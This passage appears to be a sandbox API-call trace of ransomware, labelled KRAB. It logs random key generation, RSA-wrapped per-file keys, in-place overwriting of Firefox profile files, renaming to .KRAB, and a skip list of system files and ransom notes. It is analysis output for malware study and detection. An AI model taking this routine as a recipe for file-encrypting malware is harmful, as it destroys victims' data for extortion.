(hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0077.977] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338e2cc | out: pbBuffer=0x338e2cc) returned 1 [0077.977] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0077.977] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.977] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x1011238) returned 1 [0077.981] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0077.981] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0077.989] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0077.989] CryptGenRandom (in: hProv=0x1011238, dwLen=0x8, pbBuffer=0x338e2ec | out: pbBuffer=0x338e2ec) returned 1 [0077.989] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0077.989] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.990] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x10109b8) returned 1 [0077.993] CryptImportKey (in: hProv=0x10109b8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0x10237b8) returned 1 [0077.993] CryptGetKeyParam (in: hKey=0x10237b8, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0077.993] CryptEncrypt (in: hKey=0x10237b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e25c*=0x100) returned 1 [0077.994] GetLastError () returned 0x0 [0077.994] CryptDestroyKey (hKey=0x10237b8) returned 1 [0077.994] CryptReleaseContext (hProv=0x10109b8, dwFlags=0x0) returned 1 [0077.994] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x1011568) returned 1 [0077.997] CryptImportKey (in: hProv=0x1011568, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0x1023578) returned 1 [0077.997] CryptGetKeyParam (in: hKey=0x1023578, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0077.997] CryptEncrypt (in: hKey=0x1023578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e25c*=0x100) returned 1 [0077.998] GetLastError () returned 0x0 [0077.998] CryptDestroyKey (hKey=0x1023578) returned 1 [0077.998] CryptReleaseContext (hProv=0x1011568, dwFlags=0x0) returned 1 [0077.998] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kl0o5i+exwq3txuldkmf9w==.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7e0 [0077.999] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0078.000] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0078.000] ReadFile (in: hFile=0x7e0, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e2fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e2fc*=0x559, lpOverlapped=0x0) returned 1 [0078.051] SetFilePointerEx (in: hFile=0x7e0, liDistanceToMove=0xfffffaa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.051] WriteFile (in: hFile=0x7e0, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x559, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e2f8*=0x559, lpOverlapped=0x0) returned 1 [0078.051] WriteFile (in: hFile=0x7e0, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e2f8*=0x208, lpOverlapped=0x0) returned 1 [0078.051] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.055] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.055] CloseHandle (hObject=0x7e0) returned 1 [0078.056] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.057] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kl0o5i+exwq3txuldkmf9w==.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kl0o5i+exwq3txuldkmf9w==.jsonlz4.krab")) returned 1 [0078.058] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.058] FindNextFileW (in: hFindFile=0x1023678, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0078.058] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0078.058] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0078.058] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a08d2ca4dee3d.lock" [0078.058] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.058] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 124 [0078.059] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a08d2ca4dee3d.lock") returned 119 [0078.059] lstrlenW (lpString=".lock") returned 5 [0078.059] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.059] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".lock ") returned 6 [0078.059] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.060] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.061] FindNextFileW (in: hFindFile=0x1023678, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0078.061] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0078.061] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0078.061] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\KRAB-DECRYPT.txt" [0078.061] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.061] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\KRAB-DECRYPT.txt.KRAB") returned 117 [0078.061] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\KRAB-DECRYPT.txt") returned 112 [0078.061] lstrlenW (lpString=".txt") returned 4 [0078.061] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.062] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".txt ") returned 5 [0078.062] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.062] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\KRAB-DECRYPT.txt") returned 112 [0078.062] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\KRAB-DECRYPT.txt") returned 112 [0078.062] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0078.062] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0078.062] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0078.062] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0078.062] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0078.062] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0078.062] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0078.062] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0078.062] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0078.062] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0078.062] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.063] FindNextFileW (in: hFindFile=0x1023678, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0078.063] FindClose (in: hFindFile=0x1023678 | out: hFindFile=0x1023678) returned 1 [0078.063] CloseHandle (hObject=0x7ec) returned 1 [0078.063] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0078.063] lstrcmpW (lpString1="cert8.db", lpString2=".") returned 1 [0078.063] lstrcmpW (lpString1="cert8.db", lpString2="..") returned 1 [0078.063] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="cert8.db" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db" [0078.064] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.064] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db.KRAB") returned 93 [0078.064] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db") returned 88 [0078.064] lstrlenW (lpString=".db") returned 3 [0078.064] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.064] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".db ") returned 4 [0078.064] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.065] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db") returned 88 [0078.065] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db") returned 88 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="desktop.ini") returned -1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="autorun.inf") returned 1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="ntuser.dat") returned -1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="iconcache.db") returned -1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="bootsect.bak") returned 1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="boot.ini") returned 1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="ntuser.dat.log") returned -1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="thumbs.db") returned -1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="KRAB-DECRYPT.html") returned -1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="KRAB-DECRYPT.txt") returned -1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="CRAB-DECRYPT.txt") returned -1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="ntldr") returned -1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="NTDETECT.COM") returned -1 [0078.065] lstrcmpiW (lpString1="cert8.db", lpString2="Bootfont.bin") returned 1 [0078.065] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.065] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011700) returned 1 [0078.069] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.069] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.069] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.070] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0078.070] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0078.070] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.070] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010c60) returned 1 [0078.073] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.074] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.074] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.074] CryptGenRandom (in: hProv=0x1010c60, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0078.074] CryptReleaseContext (hProv=0x1010c60, dwFlags=0x0) returned 1 [0078.074] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.074] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010d70) returned 1 [0078.078] CryptImportKey (in: hProv=0x1010d70, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xffe698) returned 1 [0078.078] CryptGetKeyParam (in: hKey=0xffe698, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0078.078] CryptEncrypt (in: hKey=0xffe698, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0078.078] GetLastError () returned 0x0 [0078.079] CryptDestroyKey (hKey=0xffe698) returned 1 [0078.079] CryptReleaseContext (hProv=0x1010d70, dwFlags=0x0) returned 1 [0078.079] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011348) returned 1 [0078.082] CryptImportKey (in: hProv=0x1011348, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xffe758) returned 1 [0078.082] CryptGetKeyParam (in: hKey=0xffe758, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0078.082] CryptEncrypt (in: hKey=0xffe758, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0078.082] GetLastError () returned 0x0 [0078.082] CryptDestroyKey (hKey=0xffe758) returned 1 [0078.082] CryptReleaseContext (hProv=0x1011348, dwFlags=0x0) returned 1 [0078.083] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cert8.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0078.083] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0078.083] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0078.084] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x18000, lpOverlapped=0x0) returned 1 [0078.134] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffe8000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.134] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x18000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x18000, lpOverlapped=0x0) returned 1 [0078.134] WriteFile (in: hFile=0x7ec, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0078.134] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.138] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.139] CloseHandle (hObject=0x7ec) returned 1 [0078.144] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.145] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cert8.db"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cert8.db.krab")) returned 1 [0078.145] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.146] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0078.146] lstrcmpW (lpString1="compatibility.ini", lpString2=".") returned 1 [0078.146] lstrcmpW (lpString1="compatibility.ini", lpString2="..") returned 1 [0078.146] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="compatibility.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini" [0078.146] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.146] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini.KRAB") returned 102 [0078.146] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini") returned 97 [0078.146] lstrlenW (lpString=".ini") returned 4 [0078.146] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.147] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".ini ") returned 5 [0078.147] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.147] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini") returned 97 [0078.147] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini") returned 97 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="desktop.ini") returned -1 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="autorun.inf") returned 1 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="ntuser.dat") returned -1 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="iconcache.db") returned -1 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="bootsect.bak") returned 1 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="boot.ini") returned 1 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="ntuser.dat.log") returned -1 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="thumbs.db") returned -1 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="KRAB-DECRYPT.html") returned -1 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="KRAB-DECRYPT.txt") returned -1 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="CRAB-DECRYPT.txt") returned -1 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="ntldr") returned -1 [0078.147] lstrcmpiW (lpString1="compatibility.ini", lpString2="NTDETECT.COM") returned -1 [0078.148] lstrcmpiW (lpString1="compatibility.ini", lpString2="Bootfont.bin") returned 1 [0078.148] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.148] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10109b8) returned 1 [0078.151] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.152] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.152] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.152] CryptGenRandom (in: hProv=0x10109b8, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0078.152] CryptReleaseContext (hProv=0x10109b8, dwFlags=0x0) returned 1 [0078.152] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.152] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011458) returned 1 [0078.155] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.156] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.156] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.156] CryptGenRandom (in: hProv=0x1011458, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0078.156] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0078.157] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.157] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011018) returned 1 [0078.176] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xffe698) returned 1 [0078.177] CryptGetKeyParam (in: hKey=0xffe698, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0078.177] CryptEncrypt (in: hKey=0xffe698, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0078.177] GetLastError () returned 0x0 [0078.177] CryptDestroyKey (hKey=0xffe698) returned 1 [0078.177] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0078.177] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011568) returned 1 [0078.180] 